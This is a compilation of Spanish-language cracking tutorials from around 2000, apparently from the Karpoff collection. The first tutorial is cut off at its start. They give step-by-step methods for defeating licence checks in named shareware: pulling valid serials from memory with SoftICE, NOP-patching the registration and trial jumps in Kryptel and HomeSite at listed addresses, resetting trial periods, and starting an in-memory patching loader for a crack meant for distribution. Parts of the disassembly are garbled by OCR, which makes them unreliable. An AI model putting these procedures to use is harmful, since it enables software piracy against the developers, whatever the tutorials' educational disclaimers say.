y arranca el challenge pool, le damos a la opción de registrar, introducimos el código y antes de darle a enter pulsamos ctrl+d y salta 
la pantalla negra y teneborsa del sice (en la q me estoy dejando la vista últimamente) ahora ponemos un breakpoint in execution (bpx 
para los colegas) talmente como este: 

bpx messageboxa 

ahora le damos a ctrl+d y volvemos al challenge pool ahora pulsamos enter y regresamos al soft-ice justo en la parte q hace q se 
genere la ventana de error,pulsamos f12 para ver quien ha llamado ha esta rutina y oh! nos hemos salido del soft-ice!!!!, no importa 
pulsamos enter y regresamos a él, ahora aparecemos en medio de un mogollón de cosas q no entendemos, bueno pues teniendo en 
cuenta la calidad de la protección del programa posiblemente no se hayan eliminado de la memoria ciertos datos q nos pueden ser 
útiles (digo supongo porq no estoy muy seguro de ello, recordad q soy novato aún) por tanto vamos a usar un comando del soft-ice q 
sirve para rastrear la memoria en busca de 'algo' q nos pudiese ser útil, bien pues tecleamos lo siguiente: s 30 1 ffffffff "número de 
serie q introdujimos" 

después del pulsar enter, el sice comenzará a buscar nuestro código en memoria y tras un breve intervalo de tiempo nos avisará de q 
lo ha encontrado, si miramos en la ventana de arriba a la derecha veremos nuestro código y si seguimos leyendo vemos ... como es 


posible!!! el código correcto!!! una vez más queda demostrada la eficacia del sistema de protección xd. lo q ha ocurrido es q el 
programa después de mandarnos la ventana de 'sigue rascando' no ha eliminado aún de la memoria los dos seriales q tiene q 
compara, el nuestro y el verdadero, bueno pues me temo q ya se ha acabado el programa, y como aconsejan los buenos crackers tras 
haber crackeado el programa deshazte de él, si te gusta cómpralo,no crees? aunq el programa no tenga un buen sistema de protección 
no quiere decir q los creadores no hayan derrochado mucho tiempo en éste para diseñarlo y programarlo, bueno este es mi consejo, 
ahora haced vosotros lo q os plazca... 

aprovecho para animaros a q escribáis vuestros propios tutoriales, venga q no es tan dificil, (va por tí x-faktor q tú también tienes 
hechos unos pocos y sabes también escribir tutoriales ; p, venga tío dale), también agradezco la paciencia de todos los del canal 
tfcrackers por soportar mis preguntas, a karpoff por sus tutoriales, así como también a mOniac_pc sin tu ayuda no me habría 
iniciado nunca de no ser por tus cursillos, argenbyte, demian por todos tus crackmes q no se crackear, pero oye al menos lo intento, 
profesor_x por tus compilaciones y tus tutoriales, son puro arte en verdad,a sable por su tutorial sobre el hmemcpy q no tengo ni idea 
de como usar, y a todos los q escribisteis para q aprendiésemos nosotros los newbies. también agradezco la oportunidad q me ha 
brindado kfor para ser uno de ellos, por todo esto gracias una vez más. 


' el bien refleja la luz, 
y el mal siembra, 
las semillas de la oscuridad, 
estos son los espejos del alma, 
los reflejos de la mente, 
elige bien... ' 


john keeper 


cualquier insulto,corrección, demanda o simplemente saludos, ruegos y preguntas a mi dirección de correo ¡keeperOcorreo.de 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: Dinamic Viewer 1.55 


PROTECCION: Serial 
Descripcion: Reproductor de imágenes 
Dificultad: Facilucha, cuando supe como ;-) 


DOWNLOAD : http: //www.ctv.es/USERS/imedia 


Herramientas: Softice 


CRACKER: Yerba Mate ../10/2000 


introduccion 


seguramente te suena la dirección de e-mail. es la misma que hice referencia en el tutorial n? 3. de allí 
habíamos bajado 'imd cd player' e 'infotel'. pero fijate que curioso, este programa usa un sistema de 
protección que no tiene nada que ver con los anteriores. en realidad, es más parecido al del tutorial n*6, con la 
diferencia que en este ni siquiera tenemos un botón de 'ok' para oprimir. dinamic viewer es un programa bien 
logrado ( no es acdsee, de acuerdo ), pequeño y su precio es accesible, por lo que lo único que nos importará 
es su sistema de protección. no fue de esos cracks de 10 minutos, la ventana de registración logró 
confundirme bastante. siempre recordad que soy simplemente otro newbie tratando de enseñar lo que sabe. 


nuevamente te voy a contar lo hechos según fueron aconteciendo. venía de crackear infotel e imd cd player según lo 
visto anteriormente, casi no me bajo el dinamic viewer porque me empezaba a aburrir. la cuestión es que lo bajé lo 
corrí, pulsé en about y en registrar. esto es lo que obtuve: 


lfyo: 
or 1.000 


Informedi: 


Send e-mail to imedia( 


Su nombre Yerba Mate | 
Número de serie : [M2345578 | Cerrar 


notas que falta algo? le falta el botón de 'ok' , 'aceptar' o lo que fuera. esto me tuvo a maltraer durante bastante 
tiempo. introduje mis datos. mi primera deducción fue que comparaba dentro de un 'loop' contínuo el serial 
introducido por mí, con el que se genera a partir del nombre ( suena lógico, no? ). por más largo que fuera mi nombre 
o serial, no logré sacarle el mensaje de inválido. mi problema era como entrar en el soft-ice, ya estaba decidido a poner 
un bpxhmemcpy (como no mostraba mensaje alguno). como no tenía otro botón para oprimir excepto el de cerrar y 
ciertamente yo no lo quería cerrar, lo quería crackear ;-), hice lo siguiente. llené con mi nombre,puse todos los 
números de mi serial menos el último (el '8'), contol-d, bpxhmemcpy, f5 y finalmente el '8'. exito!!!!!.... entre en el soft- 
ice.desactivé el breakpoint con 'bd00". fuí de 'ret' en 'ret' con 'f12' hasta que llegué al 'dv!code' , al llegar allí con £10 
fuí trazando. econtré mi buscado loop. 


xxxx:445e01 8b03 mov eax, dword ptr (ebx) 

xxxx:445e03 e8ac2c0000 call 00448ab4 

xxxx:445e08 8b03 mov eax dword ptr (ebx) 

xxxx:445e0a 80b88400000000 cmp byte ptr (eax+00000084) , 00 
xxxx:445e11 740f je 00445e22 

xxxx:445e13 sb45fc mov eax , dword ptr (ebp-04) 

xxxx:445e16 c7802c02000002000000 mov dword ptr (ebx+0000022c) , 00000002 
xxxx:445e20 eb14 jmp 00445e36 

xxxx:445e22 8b45fc mov eax , dword ptr (ebx-04) 

xxxx:445e25 83b82c02000000 cmp dword ptr (eax+0000022c) , 00000000 
xxxx:445e31 e826fdffff call 00445b5c 

xxxx:445e36 sb45fc mov eax , dword ptr (ebp-04) 

xxxx:445e39 8b802c020000 mov eax , dword ptr (eax+0000022c) 
xxxx:445e3f 85c0 test eax, eax 

xxxx:445e41 74be je 00445e01 


por más que busqué en los registros no encontraba ni mi nombre, ni mi serial. trazaba dentro de los call con f8 y nada. 
si invertía algún salto para salir del loop y seguía trazando llegaba a un ret que me devolvía al programa pero sin la 
pantalla con los datos, como si hubiera pulsado el botón de cerrar. MMMMM...ooocccocccc... dura la vida del cracker........... 


lo único que había descubierto era la existencia de un achivo dvopt.cfg en la carpeta donde tenía instalado el dinamic 
builder. este archivo se crea la primera vez que corres el programa. si lo borrás volves a estar en el día cero del período 
de evaluación. es más si lo borrás, adelantás el reloj de tu pc unos 3 años, corrés el programa y reestableces el reloj a la 
fecha actual, tendrás más de 1800 días para evaluar el programa. trataba de conformarme con eso ( ..que va a ser.. ) 
pero no daba resultado. 


la existencia de san cracker martir, velando por nosotros en las largas noches de cracking, queda práticamente 
demostrada a continuación ;-) 


en otro infructuoso intento de sacarle el serial sin resultado alguno, me había quedado puesto el bpx hmemcpy en el 
soft-ice cuando cerré la ventana de datos con intención de apagar la pc. entró el soft-ice (por voluntad propia, nada de 
zen cracking) ...Y.......... buehhh........... ya que estaba, empecé a trazar el código nuevamente. ahí lo ví, un glorioso 
ad24111111. todo era claro ahora. encontraba con facilidad mi nombre, mi falso serial, el verdadero, la comparación 


entre ambos y justo debajo un call y un salto condicional que no se efectuaba. 


004 7CDEC 8B45F3 mov eax, dword ptr 
:0047CDEF SD55FC lea edx, dword ptr 
:D0047CDF2 ESOS5100100 call 0048DDFC 
:0047CDF7? SD55FS lea edx, dword ptr 
:0047CDFA A124794900 mov eax, dword ptr 
:0047CDFF SBS8DE0020000 mov eax, dword ptr 
:0047CEO5 ESS6F9FAFF call 00420790 
:0047CEOA SBS55FS mov edx, dword ptr 
:0047CEOD 8B45FC mov eax, dword ptr 
:0047CE1O0 ES17?71FSFF call 00403F2C 
:0047CE15 OFS550010000 jne 0047CF6B 


[ebp-08] Yerba Mate 
[ebp-04] 

[ebp-08] 

[00497924] 

[eax+00000ZE0] 

[ebp-08] 12345678 
[ebp-04] AD24111111 


¿que es lo que pasó? el programa necesita que pulses el botón de cerrar para evaluar los datos introducidos. si en 
lugar de decir 'cerrar' hubiera dicho 'ok' o 'aceptar' todo hubiera sido simple. el programador logró confundirme con ese 


simple truco. 


tal vez aprendiste algo nuevo o simplemente te sonreiste un rato. lo que te quise mostrar aquí es que no siempre 
encontrarás el serial en el primer intento. aún cuando la protección sea simple. guarda el programa en algún lugarsito 
del 'rígido' (no, no lo borres). seguí leyendo tutoriales, seguí practicando, en fín seguí aprendiendo.y cada tanto intentá 
crackearlo nuevamente. la felicidad de encontrar el serial válido bién vale el esfuerzo. 


por dudas o consultas comunicate a http://yerbamatear O yahoo.com 


espero que este tutorial te haya sido útil, nos vemos en el próximo 


yerba mate 


' todo es fácil cuando se sabe como' 


importante: lo que hacemos aquí es tratar de aprender como abrir un candado con un alambre, no como robar alguna 
propiedad. si vas a usar este programa debes comprarlo. si no fuera por los programadores de shareware 


no tendríamos con que entretenernos. 


karpoff spanish tutor: pagina dedicada a la dibulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: Kryptel 3.62 

PROTECCION: Serial 8 Trial 30 

Objetivo: Simular Estar Registrados 
Kryptel 3.62 es un software de encriptación de datos (su nombre ya lo 

Descripcion: dice...) que según sus autores protege con un algoritmo muy difícil de 
romper 

Dificultad: Facil 

DOWNLOAD: bttp:/finv*,co.naf 

Herramientas: Wdasm 8.9, Softice 4.5, UltraEdit32 6, PMaker 

CRACKER: BugSys FECHA: 22/10/00 

introduccion 


bueno, pues aquí estoy con un nuevo tutorial para principiantes. espero que el del 
readiris se haya entendido y haya sido útil. 


kryptel 3.62 es un software de encriptación de datos (su nombre ya lo dice...) que 
según sus autores protege con un algoritmo muy difícil de romper (ellos dicen 
imposible :-) )cualquier archivo que tengamos y al que no queremos que nadie tenga 


acceso. la encriptación se hace en función de una clave tan complicada como nosotros 
queramos, con la ventaja de que el interface es muy sencillo y se parece al 
explorador de windows. 

ya que se trata de un programa de encriptado, se supone que la protección será 
interesante y enrevesada ¿no?. un programador capaz de hacer algo así también sabrá 


proteger su software... 


al atake 
estudiando el objetivo 


pues eso, instalemos el kryptel en nuestro ordenador y ejecutémoslo como siempre... aparece la típica pantallita que 
nos dice que es una versión de evaluación, que nos quedan 30 días de prueba y esas cosas. damos a ok y jugamos un 
poco con el programilla... parece útil para esconder ciertas cosillas de los curiosos. 


hacemos lo de siempre, adelantar el reloj dos o tres meses y ver que pasa.... sale una pantalla que dice que ha caducado 
y que no quiere volver a funcionar mientras no le introduzcas un serial válido. ahora podemos hacer dos cosas: 
buscarnos el serial o buscamos la comprobación que le dice que lo hemos registrado... personalmente prefiero la 
segunda porque es más rápido y deja más tiempo para hacer otras cosillas... 


primera sorpresa: 


cómo el programa ya ha caducado, volvamos a poner el reloj del ordenador en hora para evitar problemas con otras 
aplicaciones. por curiosidad ejecutamos otra vez el brw.exe y vemos que aún nos quedan 30 días de prueba (¿? ...si 
había caducado...); genial, sólo mira la fecha y la compara con algo, pero no escribe en ningún sitio que ha caducado, 
con sólo cambiar la fecha ya funciona siempre. :-) 


segunda sorpresa: 

bueno, no puede ser tan fácil... seguro que tiene truco en algún sitio, así que vamos a desensamblarlo con el wdasm y 
ver las sref para ver que podemos hacer por ahí ( nos interesan las que dicen ''wrong registration code'' (para los que 
no sepan inglis pitinglis "código de registro incorrecto'') y la que dice 'the evaluation period has expired" ("el 


período de evaluación ha expirado"'). haciendo doble click sobre ellas aparecemos en el código que transcribo editad 
o a continuación: 


:00404106 ff1578484100 call dword ptr [00414878] 

:0040410c a17c234100 mov eax, dword ptr [0041237c] 

:00404111 390578234100 cmp dword ptr [00412378], eax 

:00404117 7510 jne 00404129<- ¡oops! caliente caliente 

:00404119 85c0 test eax, eax 

:004041 1b 750c ¡ne 00404129<- ¡otra vez! 

:0040411d c6059034410001 mov byte ptr [00413490], 01<-se parece a un flag... 
:00404124 e9d5000000 ¡mp 00404 1fe<- nunca formará la messageboxa si llega hasta aquí ahora. 
:00404129 8b0d742b4100 mov ecx, dword ptr [00412b74] <- rutina que se ejecuta cuando no estamos registados 
:0040412f 8b155c2b4100 mov edx, dword ptr [00412b5c] 

:00404135 3bca cmp ecx, edx 

:00404137 7f6d jg 00404146 <- salta si ecx es mayor que edx (superados los 30 días) 
:00404139 a1702b4100 mov eax, dword ptr [00412b70] 

:0040413e 7c08 jl 00404148 <-salto normal si no ha caducado 

:00404140 3b05582b4100 cmp eax, dword ptr [00412b58] 

:00404146 775e ja 00404146 <- cuidadín con esta dirección 

:00404148 8b1d582b4100 mov ebx, dword ptr [00412b58] 

:0040414e 2bd8 sub ebx, eax 

:00404150 8bf2 mov esi, edx 

:00404152 1bf1 sbb esi, ecx 

:00404154 bf92170000 mov edi, 00001792 


:00404159 3bf7 cmp esi, edi 


:0040415b 7149 jg 004041a6<- salta si esi es mayor que edi (segunda comprobación de superados los 30 días por si has superado la 
primera ) 


:0040415d 7c08 jl 00404167<-salto normal si no ha caducado (pero lleva el flag a 0 -> versión evaluación) 
:0040415f 81fb008064f8 cmp ebx, f8648000 
:00404165 773f ja 00404146 <- última comprobación que nos lleva a esta dirección 


:00404167 2b05582b4100 sub eax, dword ptr [00412b58] 


o dee ole ole oe le ode ad ole ale 


* reference to: user32.postmessagea, ord:01b1h 


:0040419e £f1538474100 call dword ptr [00414738] 


:004041a4 eb58 ¡mp 004041fe 


o dele ole ode oe le ode ad ole ale 


* possible reference to string resource id=00570: "the evaluation period has expired! <- aquí está la referencia 


please, register the sof"' 


dls ae led e 


:004041d2 683a020000 push 0000023a 
* reference to: user32.messageboxa, ord:0195h 


:004041f8 ff158c474100 call dword ptr [0041478c] 


ahora llega el momento de pensar un ratito... sabemos seguro que si se ejecutan las llamadas a postmessagea y 
messageboxa no vamos a ningún lado, así que habrá que buscar hacia arriba algo que le diga que no vaya a esa 
dirección o a sus cercanías... (jn,¿jnz, jg , jge, ja y similares). este método es el típico "de libro", y aparece en 
muchos programas shareware y en algunas aplicaciones comerciales (échale un vistazo a la demo del vegas pro de 
sonic foundry y verás..) 

. Creo que no hace falta decir lo que hay que hacer con esos dos saltos condicionales, así que carga el ultraedit y 
cambia esos 75 tan feos por algo más bonito, no sé.. un 90 quizás (nop). 


fijaros en la instrucción que aparece señalada en verde antes del salto incondicional. lo que hace es poner un uno en esa 
dirección de memoria señalando que estamos registrados y que hemos pagado por el programa, si cambias el 01 por 00 
con el softice mira lo que pasa... a ese tipo de instrucciones es a lo que se le llama flag, y más o menos funciona como 
un semáforo O = rojo y 1 = verde.. :-)... 


la razón de elegir esos puntos para poner nuestro parche es porque los demás condicionales que hay por debajo son los 
encargados de verificar las fechas del ordenador y otra interna del programa (almacenadas en ecx y edx que da la 
impresión de que están encriptadas..), si la primera es mayor salta a 404146 y nos deja sin programa, sino continúa y 
aún hace dos verificaciones más antes de llevarnos a 4041fe con el flag puesto a O (no estamos registrados). si 
hubiésemos parcheado más abajo en los jg para que nunca saltase a 404146 lo único que habríamos hecho es conseguir 
que nunca mostrara la pantalla de caducidad ni dejara de funcionar, pero seguiría siendo una versión de evaluación. 


Ok, ahora con el brw.exe parcheado vamos a ejecutarlo. ya no aparece la nag que recuerda que es una versión de 
evaluación... y ya no aparece lo de evaluation copy en la ventana.... !, vamos al about y dice que la copia está 


licenciada a alguien... como se puede ver la comprobación de si estamos registrados o no y si la fecha es correcta o no 
están juntas y pegaditas a la línea que nos avisa que ha caducado ... 


bueno, pues sólo nos queda buscar la forma de meter nuestro nombre en el about. lo ponemos en el kryptel.ini y listo, 
pero visto lo visto, vamos a echar un vistazo al codigo que nos dice que el serial no es válido: 


:004012a2 es7d000000 call 00401324 

:004012a7 83c40c add esp, 0000000c 

:004012aa 84c0 test al, al 

:004012ac 752d ¡ne 004012db <-más de lo mismo 

:004012ae 6810200000 push 00002010 

* possible stringdata ref from data obj ->"registration error"| <-caption de la messageboxa 
:004012b3 682c214100 push 0041212c 

* possible stringdata ref from data obj ->""wrong registration code." <- el string de marras 
:004012b8 68d0204100 push 00412040 

* referenced by a (u)nconditional or (c)onditional jump at address: 

1:0040127c(u) 

:004012bd f£7508 push [ebp+08] 


* reference to: user32.messageboxa, ord:0195h 


sobra decir lo que hay que hacer para que acepte cualquier cosa que le metas..... si sigues mirando hacia arriba hay un 
código exactamente igual para el nombre. 


resumiendo: 

para conseguir que el kryptel nos reconozca como usuarios registrados hay que anular los dos saltos condicionales en 
404117 y 404124, y para que nos admita cuaquier serial el que hay en 4010ac convertirlo en un salto incondicional. fin 
de la historia del kryptel. 

reflexiones: 

un software de encriptación que dice ser indescifrable, por lo menos debería dar algo más de trabajo, al suponerse que 
el programador tiene conocimientos suficientes para proteger como dios manda su programa. de todas las protecciones 
que he tratado en el poco tiempo que llevo en esto, está es la más fácil de cascar con diferencia.., pero se agradece que 
aún haya software así para pasar el tiempo y que los newbies aprendamos... no todo van a ser achivos pe, vbox y 
antidebuggers (últimamente las pillo todas juntas ...). 


recordad que si vais a utilizar este programa deberéis comprarlo. 


las acciones aquí descritas lo son con fines educativos. su puesta en práctica va en contra de la ley de derechos de autor 
y está penado. 


próximamente : protección de allaire homesite 4.5 y creación de un loader con rpp. 


karpoff spanish tutor: pagina dedicada a la divulgacion de informacion en castellano, sobre 


ingenieria inversa y programacion. email "colabora con tus proyectos" 


Karpoff Spanish Tutor 


Programa: Allaire HomeSite 4.5a 

PROTECCION: Caducidad a los 30 días 

Objetivo: Simular Estar Registrados 

Descripcion: HomeSite 4.5 es un software de edición de páginas web 

Dificultad: Facil - Intermedio 

DOWNLOAD : http://www.allaire.com 

Herramientas: Wdasm 8.9, Softice 4.5, UltraEdit32 6, RPP 

CRACKER: BugSys FECHA: 22/10/00 
INTRODUCCION 


homesite 4.5 es un software de edición de páginas web. incluye editor html para 
aquellos que controlen realmente ese lenguaje, editor wysiwyg para los comodones de y 
previsualizador (browser) que se comporta como el iexplorer. si se combina con el 
dreamweaver de macromedia se pueden crear sites realmente impresionantes, ya que 
soporta css, asp, cfm, sql y un montón de cosas más. quizás sea más complicado de 
usar que el dreamweaver, pero una vez que te haces con él es difícil dejar de 
utilizarlo... 

la protección que trae es una limitación de 30 días, tras los cuales aparece una 
ventana que nos recuerda que ha caducado pero nos permite seguir usándolo, 
advirtiéndonos que si lo hacemos estamos violando el contrato de licencia. 

lo que tendremos que hacer para una evaluación más tranquila es eliminar las nags de 
incio con el logo de allaire, la ventana que sale cuando caduca, retocar el caption 
de la ventana principal y eliminar el dialogo about. 


al atake 


en fin, manos a la obra. tras descargar el programa de la web de allaire o buscarlo en los cd que haya por casa ( mi 
versión la saqué del cd shareware que venía en pc actual de abril de 2000) lo instalamos, vemos cómo funciona y lo 
que trae de protección: en principio nada del otro mundo, un par de nags amarillas con una cuenta atrás de los días que 
quedan para que caduque y poco más. adelantamos el reloj 60 días y es cuando aparece la ventana que nos dice que 
seguir usándolo violaría el contrato de licencia. ok, tres nags que hay que eliminar. 


primer problema: 


vamos a echarle un vistazo al código. cargamos el w32dasm, abrimos homesite45.exe y la hemos cagao, se queda 
colgado y no sale nada. seguimos como al principio. con el w32dasm no podemos hacer nada (de momento.. ;-p). 


segundo problema: 


si no se puede hacer nada con el programa fiambre, le hacemos una biopsia y listo. pues tampoco. al cargarlo con el 
loader de softice este no salta y nos quedamos con cara de tontos mirando para la pantalla. de momento hay que seguir 
estudiando el ejecutable para ver por donde entrarle. 


aproximándonos a la víctima: 


para este paso necesitaremos la herramienta gettype, o en su defecto el exescan, ambos disponibles en muchos sitios. el 
comando a utilizar con el gettype sería: 


c:> gtw homesite45.exe /ze (los path serán los que tu tengas en el ordenador) 
y obtenemos lo siguiente: 
> H gettyp 2.592 H > +* copyright (c) 1997-99 by phax + --- 


- --- H phaxOwriteme.CcOM $ + http://surf.to/phax + --- 


o + free edition + --- 


- [c:¡herramientashome.exe] ----- 

dos executable file - 1457152 bytes 

portable executable (starting at 256 for 1456896 bytes)<- es un archivo pe 
compiler: borland delphi 3/4 (heuristic) 

calculated entrypoint: 1432577 / 0O15dcO1h (rva: 004d4001h) 
required cpu type: 80386 

requires any version of win32 

flags: 

file is executable 

line numbers stripped from file 

local symbols stripped from file 

32 bit word machine 

linker version: 2.25 

objects (object align = 00001000h): 

name virt size rva phys size phys ofs 


code 00305000h 00001000h 0010ca00h 00000400h 


data 00021000h 00306000h 00003000h 0010ce00h 
bss 00007000h 00327000h 00000000h 0010fe00h 
.idata 00004000h 0032e000h 00001600h 0010fe00h 
.tls 00001000h 00332000h 00000000h 00111400h 
.rdata 00001000h 00333000h 00000200h 00111400h 
.reloc 0002f000h 00334000h 00000000h 00111600h 
.rsrc 00171000h 00363000h 0004c600h 00111600h 
.aspack 00006000h 004d4000h 00006000h 0015dc00h <- y está comprimido con aspack v?? 
.rsrc 00001000h 004da000h 00000000h 00163c00h 
- files identified: 1 of 1 (100.00%) 

- total time: 60.0 ms (60.0 ms/file) 


bueno, ya sabenos que tenemos entre manos un archivo comprimido con aspack... del que hay varias versiones pero 
esta no la detecta.(la versión 4.0 estaba comprimida con shrink... tutorial de d.a en la página de karpoff) 


con esta información podríamos acudir al procdump y descomprimirlo con el script adecuado para aspack , pero como 
no se la versión y no voy a probarlas todas , me conformaré con que lo carge el loader del sice para la biopsia.(de todas 
formas mi versión del p.d. no fué capaz de desempacarlo cuando conseguí saber la versión). 


la otra solución es bajarse de protoolz el descompresor específico para aspack , que lo identifica como comprimido con 
aspack2000. no sirve de nada porque tras preparar el ejecutable para el w32dasm no aparecen los strings que nos 
interesan y que posiblemente estarán en una librería como los iconos. eso sí , obtenemos un ejemplar descomprimido 
que nos facilitará las cosas más adelante al trazarlo con el softice.. 


el procesado del ejecutable para que se carge en el w32dasm y en el loader del debugger es el siguiente: 


con el procdump cargado vamos a pe editor -> sections y clickeamos con el botón derecho del ratón sobre la sección 
code del ejecutable, y nos aparece la siguiente pantalla: 


Sections Editor 


Sections Informations : 


00305000 00001000 00000400 Co000040 
00021000 00306000 00003000 D010CED0 C0000040 
00007000 00327000 0000000 DO10FEDO Co000040 
00004000 0032€000 00001600 D010FEDO Co000040 
00001000 00332000 00000000 00111400 20000040 
00001000 00333000 00000200 00111400 Co0000040 


Modify section value 


Section informations 


Name [coDe 
WSize [00305000 Aa  J00001000 


PSize [001 0C400 Difset [00000400 
Section Characteristics : [coo00040 Cancel 


si quieres saber más sobre los datos que aparecen ahí, lee los tutoriales sobre el procdump que hay en el ecd. a nosotros 
nos interesa section characteristics y su valor. el c0000040 lo cambiamos por e0000060, que activa las características 
image_scn_ent_code y image_scs_mem_execute para la sección code del ejecutable (más información en los otros 
tutoriales sobre archivos pe), de forma que podamos cargarlo con el loader para ver cómo funciona. prueba ahora y 
verás, ¿a que ya salta el softice?... ;-), pués ahora empieza la diversión.... 


la estrategia: 


recordemos que necesitamos deshacernos de dos nags amarillas exactamente iguales que aparecen al principio y la que 
anuncia que ha caducado. para ello utilizaremos mi comando favorito para cargarme ventanas hwnd. seguramente no 
descubra nada nuevo, pero son pocos los tutoriales sobre nags que hablan de esta función, mucho más eficaz y versátil 
que las típicas messageboxa y similares que se suelen mencionar siempre. 


cuando escribimos el comando hwnd nos aparece una lista con todas las ventanas y componentes de estas (botones, 
cajas de texto...), con su handle, programa al que pertenece, dirección y nombre (muchas veces muy ilustrativo). lo 
único que hay que hacer es elegir la que nos interesa (suele ser la primera que aparece con el nombre del programa que 
estamos trazando), poner un bmsg (el mejor complemento a un buen hwnd) y trazar hacia atrás hasta la función madre 
que hace que se cree la nag para nopearla o buscar el salto condicional que hace que caigamos en ella. la sintaxis del 
comando bmsg es: 


bmsg wm_<opción> (para la lista de opciones escribe wmsg en el sice, las más comunes son bmsg wm_destroy y 
wm_enable..) 


y normalmente en unos cuantos f10 estaremos en el lugar adecuado para poner unos cuantos 90 y olvidarnos de la 
pantalla. 


manos a la obra: 


con el archivo ejecutable (comprimido o descomprimido) ya preparado parar el loader, lo cargamos y vamos siguiendo 
con f10 cómo se comporta el programa. si estamos usando el archivo comprimido, habrá que esperar a que esté 


totalmente desplegado en memoria para poder ver el código original ; si usamos el descomprimido, que es lo más 
adecuado ya vemos el código desde el principio, y tras unos cuantos f10 caeremos en la rutina que crea las nags 
amarillas, que está en 007057ec. lo que hay que hacer a continuación no es necesario explicarlo ya que el código es lo 
suficientemente ilustrativo. 


:007057de cmp byte ptr [0072d658], 00 

:007057e5 je 7057fd 

:007057€e7 mov .... 

:007057ec call 452624 <- llamada que genera las nags amarillas 


hacemos un bpx en la posición de memoria que hallamos elegido para parchear, lanzamos de nuevo el programa y 
cambiamos los bytes oportunos. perfecto, ya no salen las nags: ahora a por la pantalla de la fecha de caducidad. 


corremos el programa hasta que aparezca la pantalla de caducidad, y en ese momento hacemos ctrl-d y escribimos en 
softice hwnd tras lo que nos sale una lista de las ventanas y objetos que tenemos en pantalla, bajamos hasta las que 
corresponden con homesite y vemos una una que se llama tevalnotice seguida de dos buttons.... más claro agua... nos 
fijamos en su handle (izquierda de la pantalla) y le damos la orden : 


bmsg <handle> wm_<opción> 
en este caso podemos utilizar dos opciones: wm_destroy o wm_enable 


si optamos por la primera, el debugger saltará en el momento que desaparece la ventanita de nuestro monitor al pulsar 
el botón de continuar. si usamos la segunda deberemos tomar el handle del botón de continuar, que está deshabilitado, 
y el debugger saltará cuando el botón reciba la orden de activarse. en cualquiera de los dos casos caeremos en el 
mismo código, que habrá que trazar hasta encontrar alguna llamada precedida de un salto condicional, hacemos un 
breakpoint con un doble click sobre la línea y seguimos. por lo general las primeras líneas de código que aparecen se 
corresponden con la formación de la ventana, caption, tamaño, colores... y no son de gran utilidad, pero las que 
aparecen al final ( última y precedentes antes de que £10 deje de hacer saltar el si ) son a las que más hay que prestar 
atención pues suele ser ahí donde se toma la decisión de formarla. hay que ser especialmente cuidadoso al parchear 
aquí porque podemos hacerlo en alguna rutina común a otros procedimientos. una vez puestos los breakpoints se 
vuelve a lanzar el programa y eliminando los que saltan continuamente llegamos al que nos interesa, que está en 
006a2c6f. ya sabéis lo que hay que hacer ¿no?. 


:00622c6b cmp byte ptr [ebp-09], 00 <- ¿han pasado los 30 días? 

:006a2c6f jne 006a2c76 <- si [ebp-09] no es 0 sigue el período de evaluación y salta la llamada a la messageboxa 
:006a2c71 call 64bad8 <- llamada a la formación de la pantalla de caducidad. 

de nuevo poneemos un breakpoint, corremos el programa. parcheamos en memoria y comprobamos que funciona. 

en estos momentos nos hemos cargado las nags del principio y la ventana de caducidad, con lo que el programa ya 


estaría preparado para una evaluación más prolongada y libre de incordios. lo único que nos quedaría sería buscar las 
cadenas de bytes con el uedit32 y cambiarlas por lo que corresponda. 


atención: este método sólo sirve para el archivo descomprimido 


si lo que deseamos es crear un crack para su distribución, no podemos envíar el ejecutable, ya que es muy grande (1.5 
mb comprimido o 4.3 mb descomprimido) , y como estamos tratando con un archivo "encogido" no nos sirve el típico 
parche porque que el código no está expuesto. lo que nos hace falta es algo que haga el parcheo "on the fly" tras la 
descompresión. esto es lo que se conoce como loader o cargador, que no es más que un programa que está atento a la 
descompresión y cambia los bytes cuando están expuestos ( como un bandolero que espera detrás de una roca a que 
aparezca su víctima... ). veremos una forma sencilla de crear uno más adelante. 


bueno, ya tenemos el homesite sin nags, pero todavía quedan restos de su pasado como versión de evaluación: en el 
título de la ventana pone *evaluation version* y la pantalla del about aún nos recuerda que los 30 días han pasado. lo 
que trataremos de hacer es cambiar el título por otra cosa ( *registered version* o tu apodo...) que ocupe los mismos 
bytes y deshabilitar la pantalla de about. 


de pesca: 


recordemos que con el w32dasm no conseguíamos ver los strings del programa, de modo que no podemos buscar así la 
línea. una pasada del search and replace buscándola tampoco sirve de mucho . la solución es buscarla en memoria con 
el softice y parchearla como hacíamos antes. para buscarla utilizamos el comando s de la siguiente manera: 


s 0 Iffffffff'evaluation' 


que le indica que busque la cadena evaluation en toda la memoria. una vez localizado el punto exacto con varios bpm 
en las posiciones obtenidas, sólo hay que escribir (click sobre la cadena) lo que queramos manteniendo la misma 
longitud en bytes. copiar el valor hex de la cadena nueva y parchear con el editor hexadecimal o con el loader. 


el procedimiento para eliminar la ventana del about es el mismo que utilizamos para la de caducidad: 
hwnd 
bmsg <handle> wm_destroy 


y trazar hasta dar con la rutina en 006b58b6. aquí no hay saltos condicionales (porque siempre que pulses about va a 
salir), con lo que la solución es anular la llamada con los nop necesarios. 


ahora sí que tenemos el homesite preparado para su evaluación sin ningún tipo de trabas :-) . 


presentación : rpp (r!sc's process patcher) 


rpp es un creador de parcheadores en tiempo real (loader) que crea un ejecutable win32 a partir de un script. el 
ejecutable carga un proceso, espera a que se descomprima / desproteja y despúes lo parchea en memoria para corregir 
los bugs que el autor ha dejado en él ( nags, evaluaciones de 30días...) y además es el único de este tipo (que crea un 
ejecutable win32 independiente). (traducción libre de la presentación original). 


se puede bajar desde la página de karpoff, en protoolz, en sudden discharge... 


la forma de utilizarlo es ejecutándolo y seleccionando el script que queremos compilar o arrastrando el script sobre el 
ejecutable (mú fácil). también desde la línea de comandos como: 


rpp.exe <script.rpp> 

-sintaxis del script: 

; <- no le hace caso a lo que vaya delante de esto (comentarios y similar) 

t= <- número de intentos de parchearlo que va a hacer hasta darlo por imposible. (8000 por defecto) 
f= <- nombre del proceso a cargar (importante que sea el nombre original del ejecutable) 


0= <- nombre del cargador (el que tú quieras) 


p= <-bytes a parchear ( dirección de memoria | bytes originales / bytes nuevos ). 
los bytes van separados por comas y su número es igual a ambos lados de la barra. 
: <- fin de la instrucción 

$ <-fin del script 

nuestro cargador: 


abrimos el notepad y escribimos el script: 


; cargador para homesite 4.5 por cracx 28 mayo de 2000 <- información para identificarlo con el tiempo :-) 
